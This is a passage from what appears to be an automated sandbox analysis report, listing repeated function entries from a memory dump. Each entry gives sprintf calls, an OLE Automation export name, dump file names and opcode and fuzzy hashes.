sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarMonthName, xrefs: 02BCC0C7
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarMonthName$ord%u
API String ID: 590974362-471790062
Opcode ID: f6798e43df4838391369fa358719ceed12aedf429f973e447f0782f8625a5b51
Instruction ID: b7ebac40f89296f00023709a449c728158cfe396114af0cc3d9f6df37d62a706
Opcode Fuzzy Hash: f6798e43df4838391369fa358719ceed12aedf429f973e447f0782f8625a5b51
Instruction Fuzzy Hash: D7E026A6E0431513E301D654BC91AFB77889F81425F4808BFF58380100E76BD20C86A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC031, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarBoolFromUI1, xrefs: 02BCC031

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromUI1$ord%u
API String ID: 590974362-1397840137
Opcode ID: e68815366ba7d96de9288066c88c9421e50e2bc611912945e6d8d799dfea6533
Instruction ID: 7b089b5234835a1fe09232b731dc42f7c9669fe57277df3540a5fb68d1f527af
Opcode Fuzzy Hash: e68815366ba7d96de9288066c88c9421e50e2bc611912945e6d8d799dfea6533
Instruction Fuzzy Hash: 0CE086A6E0432A17E201D654BC91AFB7798AFC1525F584DBEF58381100F766920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC027, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarFormatPercent, xrefs: 02BCC027
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarFormatPercent$ord%u
API String ID: 590974362-638058408
Opcode ID: 3ff240877da7219af107bd3ea7dbfbbc675642f3073f26bc729a3ef36cb6dd50
Instruction ID: 77fc16203c72cdbaf3a6dca8b8cd976a76dff4298590f197ebadd1855663e953
Opcode Fuzzy Hash: 3ff240877da7219af107bd3ea7dbfbbc675642f3073f26bc729a3ef36cb6dd50
Instruction Fuzzy Hash: 26E086E6E0431617E205D6A4BC51AFB77989F81525F4809BFF98341240E7AED21C86A3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC018, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarBstrFromBool, xrefs: 02BCC018
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBstrFromBool$ord%u
API String ID: 590974362-1558790360
Opcode ID: e24578e9f9039a7658e162353e93309b1cad64132720491f379043773b6c2d77
Instruction ID: d6e744921505113a12748f85c43c349e58bda317872a04ed3632a2f452394bfb
Opcode Fuzzy Hash: e24578e9f9039a7658e162353e93309b1cad64132720491f379043773b6c2d77
Instruction Fuzzy Hash: 69E086A6E0432A27E201D654BC91AFB77C89F81525F4808BFF58381200E76AD20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC009, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarBstrFromDisp, xrefs: 02BCC009

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBstrFromDisp$ord%u
API String ID: 590974362-2844236747
Opcode ID: b2cb758fd7a3cc96bc1bfdc14596feec4421a7cdbc824148c9cb516bc1bf2fdb
Instruction ID: 2db2c84b109b3333a40047bfe2696d3753ebcf3ae922ed2bdd7fdaa4a2927d7b
Opcode Fuzzy Hash: b2cb758fd7a3cc96bc1bfdc14596feec4421a7cdbc824148c9cb516bc1bf2fdb
Instruction Fuzzy Hash: ACE086AAE0431617E201D654BC91AFB7798AFC1525F5849BEF58241200F7AA920C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC077, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarBoolFromDate, xrefs: 02BCC077
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromDate$ord%u
API String ID: 590974362-3134775446
Opcode ID: 6b75c1b1df10fbe9ab9843a7e9d936f2d8a0265514a4c9cd5ad7f52a6468e9b2
Instruction ID: 73f90f99423a562d699ac38037fe6f27437794a4cdde6eaa5a438816ae2850bd
Opcode Fuzzy Hash: 6b75c1b1df10fbe9ab9843a7e9d936f2d8a0265514a4c9cd5ad7f52a6468e9b2
Instruction Fuzzy Hash: 38E086A6E0431917E205DA54BC51AFB7798AF81525F4809BFF5C741140E76AE21C8AA3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC068, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
VarBoolFromR8, xrefs: 02BCC068

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromR8$ord%u
API String ID: 590974362-3918732903
Opcode ID: 297c45babc81c497e11e0f6ae779690ace7d8df86350d529d645f56665aec194
Instruction ID: 31cb387e634d549b3bf0df29f06901a147eeabb336bd990f584728d017ab8479
Opcode Fuzzy Hash: 297c45babc81c497e11e0f6ae779690ace7d8df86350d529d645f56665aec194
Instruction Fuzzy Hash: E3E086E6E4431A27E201D654BC91AFB77CC9F81525F480CBFF98781100E766D20C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC059, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarBoolFromR4, xrefs: 02BCC059
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromR4$ord%u
API String ID: 590974362-775123987
Opcode ID: df25972f3b5643e03284c58e27aeb5becbbaf8dfd90fa080f95f6c97b26ee6c3
Instruction ID: cce7d87bf19df8584932169b78f5ee33476d2a160fff9823cae508c017eab83c
Opcode Fuzzy Hash: df25972f3b5643e03284c58e27aeb5becbbaf8dfd90fa080f95f6c97b26ee6c3
Instruction Fuzzy Hash: 57E086A6E0431617E201D654BC91AFB7798AFC1525F584DBEF98781100F766920C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC04F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarBoolFromI4, xrefs: 02BCC04F
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromI4$ord%u
API String ID: 590974362-266492270
Opcode ID: 2fad3eac8899f720e28bdb5abb30ce6553933994f2b53fe614d535ddf21226de
Instruction ID: 89faa307c0c3bd3029dd23e22f86bb4bf501834ecf26307abe595eca91e4e88f
Opcode Fuzzy Hash: 2fad3eac8899f720e28bdb5abb30ce6553933994f2b53fe614d535ddf21226de
Instruction Fuzzy Hash: 4BE086A6E0432517E605D654BC51AFB7798AF81525F4809BFF58341140E76AD21C86E3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC040, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarBoolFromI2, xrefs: 02BCC040
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarBoolFromI2$ord%u
API String ID: 590974362-1815243860
Opcode ID: a0b0c38057c6e29ffcc4268c4a60568c56e76aa3804cea347a39b4a07e4e96f1
Instruction ID: 4a17a3a7554fb506805739a396e32e5de01b578a11765b416aaf206668dfd270
Opcode Fuzzy Hash: a0b0c38057c6e29ffcc4268c4a60568c56e76aa3804cea347a39b4a07e4e96f1
Instruction Fuzzy Hash: 0AE086A6E0432A27E201D654BC91AFB77CC9F81565F480CBFF58381100E766D20C86B3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC1B7, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VariantChangeTypeEx, xrefs: 02BCC1B7
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VariantChangeTypeEx$ord%u
API String ID: 590974362-1190244224
Opcode ID: 36088d7f3072f6aebe5f411d39ef27f5ec0ed18c9a194981a75e67fde8d0cbaf
Instruction ID: fa0f63cbafe2eca8647f8e76dcdfa830888d460cdc6c0feeb55c36f36cedcc17
Opcode Fuzzy Hash: 36088d7f3072f6aebe5f411d39ef27f5ec0ed18c9a194981a75e67fde8d0cbaf
Instruction Fuzzy Hash: 64E086AAE0431517E205D694BC51AFB77989F81525F4809BFF98351140E76ED21C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC1A8, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

ord%u, xrefs: 02BCD510
DispCallFunc, xrefs: 02BCC1A8

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: DispCallFunc$ord%u
API String ID: 590974362-976256695
Opcode ID: ded780b97a080a399bdbbcadb0f077dc87dbea3c0909d90057ebeb3ff12c3d83
Instruction ID: c056c180c1851df1f5510af37e01fba841ba0d1fe41c2d45fb6cb83492744ac9
Opcode Fuzzy Hash: ded780b97a080a399bdbbcadb0f077dc87dbea3c0909d90057ebeb3ff12c3d83
Instruction Fuzzy Hash: 94E086A6E0431A27E201D654BC91AFB77C89F85565F4808BFF58381140E76AD20C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC199, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

DllGetClassObject, xrefs: 02BCC199
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: DllGetClassObject$ord%u
API String ID: 590974362-536947427
Opcode ID: 8a76f8b9f10bf7424d7dd9545836f5b5928b4963ff1756ffc5b74c161e65ffd3
Instruction ID: e64f82a232c176ad2e29c2df592995f817cd1893655b147b78963b76350bb550
Opcode Fuzzy Hash: 8a76f8b9f10bf7424d7dd9545836f5b5928b4963ff1756ffc5b74c161e65ffd3
Instruction Fuzzy Hash: 3DE086A6E0432617E201D654BC91AFB7798AFC5525F584DBEF58241100F76A920C8AF3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC18F, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

DllCanUnloadNow, xrefs: 02BCC18F
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: DllCanUnloadNow$ord%u
API String ID: 590974362-3877503253
Opcode ID: 1091853c5719bc6ef5d03065addba0de761bf5f646cd930443be6f2d7f4e792c
Instruction ID: f96cfbfe9c30ff3f88c795dceab398cd5bf3bbaa07ccb8732e779b09ca196df2
Opcode Fuzzy Hash: 1091853c5719bc6ef5d03065addba0de761bf5f646cd930443be6f2d7f4e792c
Instruction Fuzzy Hash: 82E026A6E0431517E201D694BC91AFB73889F81424F4809BFF58340100E76AD20CCAB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC180, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarDiv, xrefs: 02BCC180
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarDiv$ord%u
API String ID: 590974362-3376205911
Opcode ID: 8c3495414add6605b33ca991fe13c1c3f25861187757c466298768dad92578c4
Instruction ID: 809ba3bb2962f6430d540ca8860adfe3524af72960e1e1055618df4c5bc23aa5
Opcode Fuzzy Hash: 8c3495414add6605b33ca991fe13c1c3f25861187757c466298768dad92578c4
Instruction Fuzzy Hash: 56E086A6E0431A27E201D654BC91AFB77CC9F85529F480CBFF58381100E76AD20C8AB3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC1F8, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

VarEqv, xrefs: 02BCC1F8
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: VarEqv$ord%u
API String ID: 590974362-1897524874
Opcode ID: 8af6f184041f114556cc6ef6ab26c719f078e1b43113b4f16929e0dfd18cc0f9
Instruction ID: 508fa87533b5c65b9f7280f759888939e3eee725730f4215f762103629a6e02e
Opcode Fuzzy Hash: 8af6f184041f114556cc6ef6ab26c719f078e1b43113b4f16929e0dfd18cc0f9
Instruction Fuzzy Hash: 3BE086A6E0431A27E201DA54BC91AFB77CC9F81525F4808BFF59381100F766E20C86F3

Uniqueness

Uniqueness Score: -1.00%

Function 02BCC1E9, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

sprintf.MSVCR90(?,WEP,?,?,00000000), ref: 02BCD4FC
sprintf.MSVCR90(?,ord%u), ref: 02BCD516

Strings

DllRegisterServer, xrefs: 02BCC1E9
ord%u, xrefs: 02BCD510

Memory Dump Source

Source File: 00000009.00000002.528642813.0000000002BA1000.00000020.00020000.sdmp, Offset: 02BA0000, based on PE: true

Associated: 00000009.00000002.528627744.0000000002BA0000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.528956981.0000000002C6C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.529091948.0000000002CB5000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529109322.0000000002CB6000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529131586.0000000002CB8000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529152188.0000000002CB9000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.529185836.0000000002CBF000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529240617.0000000002CC6000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.529258665.0000000002CC7000.00000002.00020000.sdmp Download File

Similarity

API ID: sprintf
String ID: DllRegisterServer$ord%u
API String ID: 590974362-1267457492
Opcode ID: cfe88fcb8fde820df86bda1ae006257f190ea6c3bde1fe065974c0099122c13a
